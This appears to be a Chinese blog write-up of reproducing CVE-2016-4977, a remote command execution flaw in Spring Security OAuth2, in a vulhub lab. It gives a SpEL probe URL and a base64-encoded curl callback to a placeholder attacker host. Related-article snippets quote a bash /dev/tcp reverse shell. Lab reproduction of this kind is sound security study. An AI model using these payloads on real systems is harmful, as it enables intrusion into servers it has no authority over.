【vulhub】Spring Security OAuth2 RCE（CVE-2016-4977）

最新推荐文章于 2024-09-08 12:10:09 发布

Crazy_Yu8

最新推荐文章于 2024-09-08 12:10:09 发布

阅读量932

点赞数

CC 4.0 BY-SA版权

文章标签： spring java 后端

本文链接：https://blog.csdn.net/weixin_42884199/article/details/121723006

本文介绍了使用Docker部署靶机，通过curl执行payload，利用poc.py脚本进行编码，并监控access.log的步骤。涉及OAuth授权、编码技巧和漏洞利用实践。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、启动靶机

docker-compose up -d

url：

http://192.168.150.143:8080/oauth/authorize

admin、admin
在这里插入图片描述
url：

http://192.168.150.143:8080/oauth/authorize?response_type=${223*223}&client_id=acme&scope=openid&redirect_uri=

在这里插入图片描述

二、生成payload

curl http://xx.xx.xx.xx/Hacker

对命令bs64编码

Y3VybCBodHRwOi8veHgueHgueHgueHgvSGFja2Vy

利用poc.py脚本生成exp

python ./poc.py

在这里插入图片描述

三、发送payload

在这里插入图片描述

四、检验

tail -f /var/log/apache2/access.log

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Crazy_Yu8

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

（CVE-2016-4977) SpringSecurityOauth 远程命令执行

weixin_45253622的博客

12-10

1796

漏洞简介： Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块，其维护者发布了这样一个升级公告，主要说明在用户使用Whitelabel views来处理错误时，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 Spring Security OAuth 支持使用标准 Spring 和 Spring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时，

CVE-2016-4977 RCE in Spring Security OAuth漏洞分析

c0c0cf的专栏

09-21

2114

新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述： When processing authorization requests using the whitelabel views, the response_type parameter value was executed

参与评论您还未登录，请先登录后发表或查看评论

CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末

weixin_45715461的博客

08-10

1679

CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末

小白上路_spring-security-oauth2 RCE复现分析

u013224189的专栏

06-29

1176

小白上路_spring-security-oauth2 RCE复现分析首先高兴的宣布，CVE-2018-1260这个漏洞复现成功，弹出了windows可爱的计算器然后就狠狠的抽自己一巴掌，讲述一下自己怎么把它折腾出来的。关于CVE-2018-1260 一个标准的由于spring将不可信数据当作SPEL表达式直接解析导致的RCE漏洞影响范围 Spring Securit...

vulhub spring 远程命令执行漏洞（CVE-2016-4977）

最新发布

shw_yzh的博客

09-08

751

spring 远程命令执行漏洞（CVE-2016-4977）

【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现

qq_45300786的博客

07-30

2458

利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth

vulhub中spring的CVE-2016-4977漏洞复现

yougexiaojiuguan的博客

11-29

662

学习过程中的记录，方便以后查看。

CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞

weixin_54376843的博客

08-29

408

在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language (SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。然后输入构造好的反弹shell命令，回车继续执行。把执行结果粘贴出来，放在下面的payload中。将命令base64编码【随便找一个编码的网站。执行上面的脚本【在放脚本的目录下执行】输入账号密码admin admin。【攻击机IP+开启监听的端口】构造反弹shell命令【备用】最后去靶机关闭docker容器。

用Docker复现SpringBoot CVE-2016-4977

m0_69555575的博客

08-22

726

Docker复现SpringBoot CVE-2016-4977

CVE-2016-4977

09-01

- *1* [【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现](https://blog.csdn.net/qq_45300786/article/details/119249422)[target="_blank" data-report-click={"spm":"1018....

Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）

EC_Carrot的博客

08-02

787

漏洞简介 Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。漏洞复现我们来进行反弹shell的操作，首先将bash命令进行编码： bash -i >& /dev/tcp/your-ip/9999 0>&1 我这里使用的是vulhub的环境，环境内有一个poc.py，用python3运行该脚本后，会让你输入字符

RCE with spring-security-oauth2漏洞复现（CVE-2018-1260）

公众号shadow sock7

04-29

1202

参考：https://xz.aliyun.com/t/2330 初始化：先根据https://github.com/wanghongfei/spring-security-oauth2-example 将内容保存为init.sql文件，然后启动mysql：参考https://blog.csdn.net/caiqiiqi/article/details/89642032 然后载入sql脚本： mys...

cve-2016-4977(spring-security-oauth) RCE漏洞复现

m0_58596609的博客

04-21

5945

cve-2016-4977(spring-security-oauth) RCE漏洞复现

CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)

精品博客,你值得一看~

09-02

1978

它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图，response_type参数值会被当做Spring SpEL来执行，恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.

spring security oauth rce (cve-2016-4977) 漏洞分析

whatday的专栏

07-02

1263

背景描述 Spring Security OAuth 2016年以前有出一个CVE，这里写一个记录学习的东西。漏洞详细 Spring Security OAuth官网有CVE-2016-4977的介绍，但是讲的不怎么清楚，就只是说了一下漏洞原理，我们就只知道是因为执行一个SpEL表达式https://pivotal.io/de/security/cve-2016-4977而产生的。看看利用的poc，大概了解一下整个过程。 http://localhost:8080/oauth/authorize?resp

vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)

weixin_43071873的博客

11-24

1795

Thinkphp 2.x 任意代码执行漏洞详情： ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po

SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现

weixin_33862514的博客

02-14

794

目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考影响版本： 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言这个漏洞与之前那个SpringBoot的SpEL表达式注入漏洞点基本一样，而且漏洞爆出来的时间点也差不多，可是...

Spring漏洞(CVE-2016-4977）在IDEA中复现

wxzyyds的博客

11-03

1382

复现Spring（CVE-2016-4977），并且在IDEA中实现动态调试

spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）复现-kali

qq_41760817的博客

12-04

1465

spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）复现